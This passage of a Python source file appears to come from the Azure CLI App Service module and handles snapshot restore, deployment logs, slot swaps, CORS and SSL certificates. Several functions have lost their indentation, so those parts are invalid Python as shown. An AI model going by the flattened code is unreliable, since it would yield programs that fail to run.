                                         recover_configuration=recover_config)
    elif source_resource_group or source_name:
        raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
    else:
        # Overwrite app with its own snapshot
        request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time,
                                         recover_configuration=recover_config)
    if slot:
        return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
    return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(cmd, db_name, db_type, db_connection_string):
DatabaseBackupSetting = cmd.get_models('DatabaseBackupSetting')
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
if any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(cmd, frequency):
FrequencyUnit = cmd.get_models('FrequencyUnit')
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num < 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
def _get_deleted_apps_locations(cli_ctx):
    """Return the locations where the 'deletedSites' resource type is available."""
    client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
    web_provider = client.providers.get('Microsoft.Web')
    for resource_type in web_provider.resource_types:
        if resource_type.resource_type == 'deletedSites':
            return resource_type.locations
    return []
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
    """Compose the authenticated local-git clone URL for the app's SCM site."""
    user = client.get_publishing_user()
    source_control = _generic_site_operation(cli_ctx, resource_group_name, name,
                                             'get_source_control', slot)
    parsed = urlparse(source_control.repo_url)
    return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
                                      parsed.netloc, name)
def _get_scm_url(cmd, resource_group_name, name, slot=None):
    """Return the https URL of the app's Kudu (SCM) host."""
    from azure.mgmt.web.models import HostType
    app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    scm_host = next((host.name for host in app.host_name_ssl_states or []
                     if host.host_type == HostType.repository), None)
    if scm_host is None:
        # this should not happen, but throw anyway
        raise ValueError('Failed to retrieve Scm Uri')
    return "https://{}".format(scm_host)
def get_publishing_user(cmd):
    """Return the subscription-level publishing (deployment) user."""
    return web_client_factory(cmd.cli_ctx).get_publishing_user()
def set_deployment_user(cmd, user_name, password=None):
    """Update deployment credentials.

    Note: all webapps in the subscription will be impacted. Prompts for the
    password when it is not supplied and a TTY is available.
    """
    User = cmd.get_models('User')
    client = web_client_factory(cmd.cli_ctx)
    if password is None:
        try:
            password = prompt_pass(msg='Password: ', confirm=True)
        except NoTTYException:
            raise CLIError('Please specify both username and password in non-interactive mode.')
    user = User(publishing_user_name=user_name)
    user.publishing_password = password
    return client.update_publishing_user(user)
def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
    """Return the app's publishing credentials (waits on the LRO)."""
    poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                     'begin_list_publishing_credentials', slot)
    return poller.result()
def list_publish_profiles(cmd, resource_group_name, name, slot=None, xml=False):
    """Return publish profiles as dicts, or the raw XML when --xml is requested."""
    import xmltodict
    content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                      'list_publishing_profile_xml_with_secrets', slot, {"format": "WebDeploy"})
    full_xml = ''.join(chunk.decode() for chunk in content)
    if xml:
        # raw XML output: force tsv so the CLI does not try to format it
        cmd.cli_ctx.invocation.data['output'] = 'tsv'
        return full_xml
    profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
    if not isinstance(profiles, list):
        profiles = [profiles]
    # strip the leading '@' xmltodict put in for attributes
    return [{key.lstrip('@'): value for key, value in profile.items()}
            for profile in profiles]
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
    """Toggle the DOCKER_ENABLE_CI app setting and return the CD webhook info."""
    update_app_settings(cmd, resource_group_name, name, ["DOCKER_ENABLE_CI=" + enable], slot)
    return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
    """Report whether container CI is enabled and, if so, its webhook URL."""
    settings = get_app_settings(cmd, resource_group_name, name, slot)
    docker_enabled = any(setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true'
                         for setting in settings)
    cd_settings = {'DOCKER_ENABLE_CI': docker_enabled}
    if docker_enabled:
        credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
        cd_settings['CI_CD_URL'] = credentials.scm_uri + '/docker/hook' if credentials else ''
    return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
    """Open the app's URL in a browser; optionally tail the log stream afterwards."""
    open_page_in_browser(_get_url(cmd, resource_group_name, name, slot))
    if logs:
        get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
    """Return the app's browse URL, preferring https when any hostname has SSL enabled."""
    SslState = cmd.get_models('SslState')
    site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    if not site:
        raise CLIError("'{}' app doesn't exist".format(name))
    host = site.enabled_host_names[0]  # picks the custom domain URL incase a domain is assigned
    has_ssl = any(state.ssl_state != SslState.disabled for state in site.host_name_ssl_states)
    scheme = 'https' if has_ssl else 'http'
    return scheme + '://' + host
# TODO: expose new blob support
def config_diagnostics(cmd, resource_group_name, name, level=None,
                       application_logging=None, web_server_logging=None,
                       docker_container_logging=None, detailed_error_messages=None,
                       failed_request_tracing=None, slot=None):
    """Configure the app's diagnostic logs (application, web-server/container,
    detailed errors, failed-request tracing).

    Parameters left as None leave the corresponding section of the logs config
    untouched (the built SiteLogsConfig carries None for that section).
    """
    from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
                                       AzureBlobStorageApplicationLogsConfig, SiteLogsConfig,
                                       HttpLogsConfig, FileSystemHttpLogsConfig,
                                       EnabledConfig)
    client = web_client_factory(cmd.cli_ctx)
    # TODO: ensure we call get_site only once
    site = client.web_apps.get(resource_group_name, name)
    if not site:
        raise CLIError("'{}' app doesn't exist".format(name))
    location = site.location
    application_logs = None
    if application_logging:
        fs_log = None
        blob_log = None
        # 'off' forces level to False; otherwise default an unspecified level to True
        level = level if application_logging != 'off' else False
        level = True if level is None else level
        if application_logging in ['filesystem', 'off']:
            fs_log = FileSystemApplicationLogsConfig(level=level)
        if application_logging in ['azureblobstorage', 'off']:
            blob_log = AzureBlobStorageApplicationLogsConfig(level=level, retention_in_days=3,
                                                             sas_url=None)
        application_logs = ApplicationLogsConfig(file_system=fs_log,
                                                 azure_blob_storage=blob_log)
    http_logs = None
    # web-server logging (Windows) and container logging (Linux) share one config knob
    server_logging_option = web_server_logging or docker_container_logging
    if server_logging_option:
        # TODO: az blob storage log config currently not in use, will be implemented later.
        # Tracked as Issue: #4764 on Github
        filesystem_log_config = None
        turned_on = server_logging_option != 'off'
        if server_logging_option in ['filesystem', 'off']:
            # 100 mb max log size, retention lasts 3 days. Yes we hard code it, portal does too
            filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
                                                             enabled=turned_on)
        http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
    detailed_error_messages_logs = (None if detailed_error_messages is None
                                    else EnabledConfig(enabled=detailed_error_messages))
    failed_request_tracing_logs = (None if failed_request_tracing is None
                                   else EnabledConfig(enabled=failed_request_tracing))
    site_log_config = SiteLogsConfig(location=location,
                                     application_logs=application_logs,
                                     http_logs=http_logs,
                                     failed_requests_tracing=failed_request_tracing_logs,
                                     detailed_error_messages=detailed_error_messages_logs)
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
                                   slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
    """Show the app's diagnostic-logs configuration."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                   'get_diagnostic_logs_configuration', slot)
def show_deployment_log(cmd, resource_group, name, slot=None, deployment_id=None):
    """Fetch the Kudu log for one deployment (the latest when no id is given)."""
    import urllib3
    import requests
    scm_url = _get_scm_url(cmd, resource_group, name, slot)
    username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
    headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
    deployment_log_url = ''
    if deployment_id:
        deployment_log_url = '{}/api/deployments/{}/log'.format(scm_url, deployment_id)
    else:
        # no id given: look up the most recent deployment's log URL
        deployments_url = '{}/api/deployments/'.format(scm_url)
        response = requests.get(deployments_url, headers=headers)
        if response.status_code != 200:
            raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
                deployments_url, response.status_code, response.reason))
        sorted_logs = sorted(response.json(), key=lambda entry: entry['start_time'], reverse=True)
        if sorted_logs and sorted_logs[0]:
            deployment_log_url = sorted_logs[0].get('log_url', '')
    if not deployment_log_url:
        return []
    response = requests.get(deployment_log_url, headers=headers)
    if response.status_code != 200:
        raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
            deployment_log_url, response.status_code, response.reason))
    return response.json()
def list_deployment_logs(cmd, resource_group, name, slot=None):
    """List deployment entries from the app's Kudu (SCM) site.

    Raises CLIError when the SCM site does not answer with HTTP 200.
    """
    import urllib3
    import requests
    scm_url = _get_scm_url(cmd, resource_group, name, slot)
    deployment_log_url = '{}/api/deployments/'.format(scm_url)
    username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
    headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
    response = requests.get(deployment_log_url, headers=headers)
    if response.status_code != 200:
        # fix: report the URL that was actually requested (previously reported scm_url)
        raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
            deployment_log_url, response.status_code, response.reason))
    return response.json() or []
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
    """Enable or disable auto-swap for a deployment slot."""
    client = web_client_factory(cmd.cli_ctx)
    site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
    if disable:
        site_config.auto_swap_slot_name = ''
    else:
        site_config.auto_swap_slot_name = auto_swap_slot or 'production'
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
                                   'update_configuration', slot, site_config)
def list_slots(cmd, resource_group_name, webapp):
    """List slots, trimming names and exposing the owning plan name."""
    client = web_client_factory(cmd.cli_ctx)
    slots = list(client.web_apps.list_slots(resource_group_name, webapp))
    for slot in slots:
        # the API returns '<app>/<slot>'; keep only the slot part
        _, _, slot.name = slot.name.rpartition('/')
        setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
        del slot.server_farm_id
    return slots
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, preserve_vnet=None, action='swap'):
    """Swap, preview, or reset a slot swap between `slot` and `target_slot`."""
    client = web_client_factory(cmd.cli_ctx)
    # Default isPreserveVnet to 'True' if preserve_vnet is 'None'
    preserve_vnet_flag = 'true' if preserve_vnet is None else preserve_vnet
    # conversion from string to Boolean
    preserve_vnet_bool = preserve_vnet_flag == 'true'
    CsmSlotEntity = cmd.get_models('CsmSlotEntity')
    slot_swap_entity = CsmSlotEntity(target_slot=target_slot or 'production',
                                     preserve_vnet=preserve_vnet_bool)
    if action == 'swap':
        return client.web_apps.begin_swap_slot(resource_group_name, webapp, slot, slot_swap_entity)
    if action == 'preview':
        if slot is None:
            return client.web_apps.apply_slot_config_to_production(resource_group_name, webapp, slot_swap_entity)
        return client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp, slot, slot_swap_entity)
    # we will reset both source slot and target slot
    if target_slot is None:
        client.web_apps.reset_production_slot_config(resource_group_name, webapp)
    else:
        client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
    return None
def delete_slot(cmd, resource_group_name, webapp, slot):
    """Delete a deployment slot."""
    # TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
    web_client_factory(cmd.cli_ctx).web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
    """Set ramp-up (traffic routing) rules from 'slot=percentage' entries."""
    RampUpRule = cmd.get_models('RampUpRule')
    client = web_client_factory(cmd.cli_ctx)
    site = client.web_apps.get(resource_group_name, name)
    if not site:
        raise CLIError("'{}' app doesn't exist".format(name))
    configs = get_site_configs(cmd, resource_group_name, name)
    # '<app>.azurewebsites.net' -> prefix '<app>', rest 'azurewebsites.net'
    host_prefix, _, host_rest = site.default_host_name.partition('.')
    rules = []
    for entry in distribution:
        slot, percentage = entry.split('=')
        rules.append(RampUpRule(
            action_host_name='{}-{}.{}'.format(host_prefix, slot, host_rest),
            reroute_percentage=float(percentage),
            name=slot))
    configs.experiments.ramp_up_rules = rules
    _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
    return configs.experiments.ramp_up_rules
def show_traffic_routing(cmd, resource_group_name, name):
    """Show the currently configured ramp-up (traffic routing) rules."""
    site_configs = get_site_configs(cmd, resource_group_name, name)
    return site_configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
    """Remove all ramp-up rules by applying an empty distribution."""
    set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
    """Append origins to the app's CORS allow-list."""
    from azure.mgmt.web.models import CorsSettings
    configs = get_site_configs(cmd, resource_group_name, name, slot)
    if not configs.cors:
        configs.cors = CorsSettings()
    existing = configs.cors.allowed_origins or []
    configs.cors.allowed_origins = existing + allowed_origins
    updated = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                      'update_configuration', slot, configs)
    return updated.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
    """Remove the given origins (or all of them when none given) from the CORS allow-list."""
    configs = get_site_configs(cmd, resource_group_name, name, slot)
    if configs.cors:
        if allowed_origins:
            remaining = [origin for origin in (configs.cors.allowed_origins or [])
                         if origin not in allowed_origins]
            configs.cors.allowed_origins = remaining
        else:
            configs.cors.allowed_origins = []
        configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                          'update_configuration', slot, configs)
    return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
    """Show the app's CORS settings."""
    return get_site_configs(cmd, resource_group_name, name, slot).cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
    """Stream live logs to stdout until interrupted with ctrl+c."""
    scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
    streaming_url = scm_url + '/logstream'
    if provider:
        streaming_url += ('/' + provider.lstrip('/'))
    user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
    worker = threading.Thread(target=_get_log, args=(streaming_url, user, password))
    worker.daemon = True
    worker.start()
    while True:
        time.sleep(100)  # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
    """Download the app's full log dump to log_file."""
    scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
    dump_url = scm_url.rstrip('/') + '/dump'
    user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
    _get_log(dump_url, user_name, password, log_file)
    logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
    """Return (username, password) publishing credentials for the site."""
    poller = _generic_site_operation(cli_ctx, resource_group_name, name,
                                     'begin_list_publishing_credentials', slot)
    creds = poller.result()
    return creds.publishing_user_name, creds.publishing_password
def _get_log(url, user_name, password, log_file=None):
    """GET `url` with basic auth; write the body to `log_file` when given,
    otherwise stream it line-by-line to the logger (stdout).
    """
    import urllib3
    try:
        # prefer pyOpenSSL's TLS implementation when it is available
        import urllib3.contrib.pyopenssl
        urllib3.contrib.pyopenssl.inject_into_urllib3()
    except ImportError:
        pass
    http = get_pool_manager(url)
    headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
    # preload_content=False keeps the connection open so we can stream the body
    r = http.request(
        'GET',
        url,
        headers=headers,
        preload_content=False
    )
    if r.status != 200:
        raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
            url, r.status, r.reason))
    if log_file:  # download logs
        with open(log_file, 'wb') as f:
            while True:
                data = r.read(1024)
                if not data:
                    break
                f.write(data)
    else:  # streaming
        std_encoding = sys.stdout.encoding
        for chunk in r.stream():
            if chunk:
                # Extra encode() and decode for stdout which does not surpport 'utf-8'
                logger.warning(chunk.decode(encoding='utf-8', errors='replace')
                               .encode(std_encoding, errors='replace')
                               .decode(std_encoding, errors='replace')
                               .rstrip('\n\r'))  # each line of log has CRLF.
    r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None):
    """Upload a PFX certificate for the webapp and register it as an App Service certificate.

    The certificate name is derived from the PFX thumbprint plus the app's
    hosting environment, location and resource group.
    """
    Certificate = cmd.get_models('Certificate')
    client = web_client_factory(cmd.cli_ctx)
    webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    # fix: read the PFX inside a context manager so the handle is always closed
    with open(certificate_file, 'rb') as cert_file:
        cert_contents = cert_file.read()
    hosting_environment_profile_param = (webapp.hosting_environment_profile.name
                                         if webapp.hosting_environment_profile else '')
    thumb_print = _get_cert(certificate_password, certificate_file)
    cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
                                    webapp.location, resource_group_name)
    cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
                       location=webapp.location, server_farm_id=webapp.server_farm_id)
    return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
    """Decrypt the .pfx file and return the certificate's SHA-1 thumbprint (colons stripped)."""
    # fix: read the file via a context manager instead of an unclosed inline open()
    with open(certificate_file, 'rb') as f:
        pfx_data = f.read()
    p12 = OpenSSL.crypto.load_pkcs12(pfx_data, certificate_password)
    cert = p12.get_certificate()
    digest_algorithm = 'sha1'
    thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
    return thumbprint
def list_ssl_certs(cmd, resource_group_name):
    """List all SSL certificate resources in the given resource group."""
    web_client = web_client_factory(cmd.cli_ctx)
    return web_client.certificates.list_by_resource_group(resource_group_name)
def show_ssl_cert(cmd, resource_group_name, certificate_name):
    """Fetch a single SSL certificate resource by name."""
    web_client = web_client_factory(cmd.cli_ctx)
    return web_client.certificates.get(resource_group_name, certificate_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
    """Delete the first certificate in the resource group whose thumbprint matches."""
    client = web_client_factory(cmd.cli_ctx)
    matches = (c for c in client.certificates.list_by_resource_group(resource_group_name)
               if c.thumbprint == certificate_thumbprint)
    cert_to_delete = next(matches, None)
    if cert_to_delete is not None:
        return client.certificates.delete(resource_group_name, cert_to_delete.name)
    raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name):
    """Import a Key Vault certificate into the webapp's resource group.

    *key_vault* may be a bare vault name (resolved against vaults visible in the
    current subscription) or a full Key Vault resource ID. In the public cloud,
    App Service Certificates stored in Key Vault are detected and mapped to the
    underlying Key Vault secret name they use.
    """
    Certificate = cmd.get_models('Certificate')
    client = web_client_factory(cmd.cli_ctx)
    webapp = client.web_apps.get(resource_group_name, name)
    if not webapp:
        raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
    server_farm_id = webapp.server_farm_id
    location = webapp.location
    kv_id = None
    if not is_valid_resource_id(key_vault):
        # Resolve a bare vault name against the current subscription's vaults.
        kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
        key_vaults = kv_client.vaults.list_by_subscription()
        for kv in key_vaults:
            if key_vault == kv.name:
                kv_id = kv.id
                break
    else:
        kv_id = key_vault
    if kv_id is None:
        kv_msg = 'The Key Vault {0} was not found in the subscription in context. ' \
                 'If your Key Vault is in a different subscription, please specify the full Resource ID: ' \
                 '\naz .. ssl import -n {1} -g {2} --key-vault-certificate-name {3} ' \
                 '--key-vault /subscriptions/[sub id]/resourceGroups/[rg]/providers/Microsoft.KeyVault/' \
                 'vaults/{0}'.format(key_vault, name, resource_group_name, key_vault_certificate_name)
        logger.warning(kv_msg)
        return
    kv_id_parts = parse_resource_id(kv_id)
    kv_name = kv_id_parts['name']
    kv_resource_group_name = kv_id_parts['resource_group']
    kv_subscription = kv_id_parts['subscription']
    # If in the public cloud, check if the certificate is an App Service Certificate,
    # in the same or a different subscription.
    kv_secret_name = None
    cloud_type = cmd.cli_ctx.cloud.name
    from azure.cli.core.commands.client_factory import get_subscription_id
    subscription_id = get_subscription_id(cmd.cli_ctx)
    if cloud_type.lower() == PUBLIC_CLOUD.lower():
        if kv_subscription.lower() != subscription_id.lower():
            diff_subscription_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_APPSERVICE,
                                                               subscription_id=kv_subscription)
            ascs = diff_subscription_client.app_service_certificate_orders.list()
        else:
            ascs = client.app_service_certificate_orders.list()
        for asc in ascs:
            if asc.name == key_vault_certificate_name:
                kv_secret_name = asc.certificates[key_vault_certificate_name].key_vault_secret_name
                break  # order names are unique within a subscription; stop at the first match
    # if kv_secret_name is not populated, it is not an appservice certificate, proceed for KV certificates
    if not kv_secret_name:
        kv_secret_name = key_vault_certificate_name
    cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name)
    lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html'
    lnk_msg = 'Find more details here: {}'.format(lnk)
    if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name, kv_subscription):
        logger.warning('Unable to verify Key Vault permissions.')
        logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission')
        logger.warning(lnk_msg)
    kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='',
                              key_vault_secret_name=kv_secret_name, server_farm_id=server_farm_id)
    return client.certificates.create_or_update(name=cert_name, resource_group_name=resource_group_name,
                                                certificate_envelope=kv_cert_def)
def create_managed_ssl_cert(cmd, resource_group_name, name, hostname, slot=None):
    """Create a free App Service managed certificate for *hostname* on the app/slot.

    The hostname must already be bound to the app and the plan must not be on the
    Free or Shared tier. Creation is polled manually because the backend answers
    202 with a Location header instead of a standard long-running operation.
    """
    Certificate = cmd.get_models('Certificate')
    hostname = hostname.lower()
    client = web_client_factory(cmd.cli_ctx)
    webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    if not webapp:
        slot_text = "Deployment slot {} in ".format(slot) if slot else ''
        raise CLIError("{0}app {1} doesn't exist in resource group {2}".format(slot_text, name, resource_group_name))
    parsed_plan_id = parse_resource_id(webapp.server_farm_id)
    plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
    if plan_info.sku.tier.upper() in ('FREE', 'SHARED'):
        raise CLIError('Managed Certificate is not supported on Free and Shared tier.')
    if not _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot):
        slot_text = " --slot {}".format(slot) if slot else ""
        raise CLIError("Hostname (custom domain) '{0}' is not registered with {1}. "
                       "Use 'az webapp config hostname add --resource-group {2} "
                       "--webapp-name {1}{3} --hostname {0}' "
                       "to register the hostname.".format(hostname, name, resource_group_name, slot_text))
    server_farm_id = webapp.server_farm_id
    location = webapp.location
    easy_cert_def = Certificate(location=location, canonical_name=hostname,
                                server_farm_id=server_farm_id, password='')
    # TODO: Update manual polling to use LongRunningOperation once backend API & new SDK supports polling
    try:
        return client.certificates.create_or_update(name=hostname, resource_group_name=resource_group_name,
                                                    certificate_envelope=easy_cert_def)
    except Exception as ex:  # pylint: disable=broad-except
        # Guard the attribute access: non-HTTP exceptions carry no 'response',
        # and the original raised AttributeError here instead of CLIError.
        response = getattr(ex, 'response', None)
        poll_url = response.headers.get('Location') if response is not None else None
        if response is not None and response.status_code == 202 and poll_url:
            r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
            poll_timeout = time.time() + 60 * 2  # 2 minute timeout
            while r.status_code != 200 and time.time() < poll_timeout:
                time.sleep(5)
                r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
            if r.status_code == 200:
                try:
                    return r.json()
                except ValueError:  # body was not JSON; return it raw
                    return r.text
            logger.warning("Managed Certificate creation in progress. Please use the command "
                           "'az webapp config ssl show -g %s --certificate-name %s' "
                           " to view your certificate once it is created", resource_group_name, hostname)
            return
        raise CLIError(ex)
def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name, key_vault_subscription):
    """Best-effort check that the Microsoft.Azure.WebSites service principal can read vault secrets."""
    from azure.cli.command_modules.role._client_factory import _graph_client_factory
    from azure.graphrbac.models import GraphErrorException
    from azure.cli.core.commands.client_factory import get_subscription_id
    subscription = get_subscription_id(cmd.cli_ctx)
    # Cannot check if key vault is in another subscription
    if subscription != key_vault_subscription:
        return False
    kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
    vault = kv_client.vaults.get(resource_group_name=resource_group_name, vault_name=key_vault_name)
    # Well-known app IDs of the Microsoft.Azure.WebSites resource provider
    # (public and government clouds respectively).
    AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd'
    AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714'
    websites_app_ids = (AZURE_PUBLIC_WEBSITES_APP_ID, AZURE_GOV_WEBSITES_APP_ID)
    graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals
    for policy in vault.properties.access_policies:
        try:
            sp = graph_sp_client.get(policy.object_id)
            if sp.app_id in websites_app_ids and "Get" in policy.permissions.secrets:
                return True
        except GraphErrorException:
            pass  # Lookup will fail for non service principals (users, groups, etc.)
    return False
def _update_host_name_ssl_state(cmd, resource_group_name, webapp_name, webapp,
                                host_name, ssl_state, thumbprint, slot=None):
    """Flip the SSL binding state of one hostname on a site and push the update."""
    Site, HostNameSslState = cmd.get_models('Site', 'HostNameSslState')
    binding = HostNameSslState(name=host_name,
                               ssl_state=ssl_state,
                               thumbprint=thumbprint,
                               to_update=True)
    # Only the SSL states, location, and tags are sent; other site settings are untouched.
    site_patch = Site(host_name_ssl_states=[binding], location=webapp.location, tags=webapp.tags)
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'begin_create_or_update',
                                   slot, site_patch)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
    """Apply *ssl_type* to every hostname covered by the certificate with the given thumbprint.

    The certificate is looked up first in the App Service plan's resource group,
    then in the app's resource group. Raises ResourceNotFoundError when the app
    or a matching certificate cannot be found.
    """
    client = web_client_factory(cmd.cli_ctx)
    webapp = client.web_apps.get(resource_group_name, name)
    if not webapp:
        raise ResourceNotFoundError("'{}' app doesn't exist".format(name))
    # Certificates usually live alongside the App Service plan, which may be in a
    # different resource group than the app itself.
    cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
    webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
    found_cert = None
    # NOTE: no break — if several certs share the thumbprint, the last one listed wins.
    for webapp_cert in webapp_certs:
        if webapp_cert.thumbprint == certificate_thumbprint:
            found_cert = webapp_cert
    if not found_cert:
        # Fall back to the app's own resource group.
        webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
        for webapp_cert in webapp_certs:
            if webapp_cert.thumbprint == certificate_thumbprint:
                found_cert = webapp_cert
    if found_cert:
        # Single non-wildcard hostname: update just that binding and return the result.
        if len(found_cert.host_names) == 1 and not found_cert.host_names[0].startswith('*'):
            return _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
                                               found_cert.host_names[0], ssl_type,
                                               certificate_thumbprint, slot)
        # Wildcard or multi-SAN cert: match its hostnames against the hostnames
        # actually configured on the app and update each matching binding.
        query_result = list_hostnames(cmd, resource_group_name, name, slot)
        hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
        to_update = _match_host_names_from_cert(found_cert.host_names, hostnames_in_webapp)
        for h in to_update:
            _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
                                        h, ssl_type, certificate_thumbprint, slot)
        return show_webapp(cmd, resource_group_name, name, slot)
    raise ResourceNotFoundError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
    """Enable an SSL binding ('SNI' or IP-based) for the certificate's hostnames."""
    SslState = cmd.get_models('SslState')
    target_state = SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled
    return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, target_state, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
    """Disable the SSL binding for the certificate's hostnames."""
    SslState = cmd.get_models('SslState')
    disabled_state = SslState.disabled
    return _update_ssl_binding(cmd, resource_group_name, name,
                               certificate_thumbprint, disabled_state, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
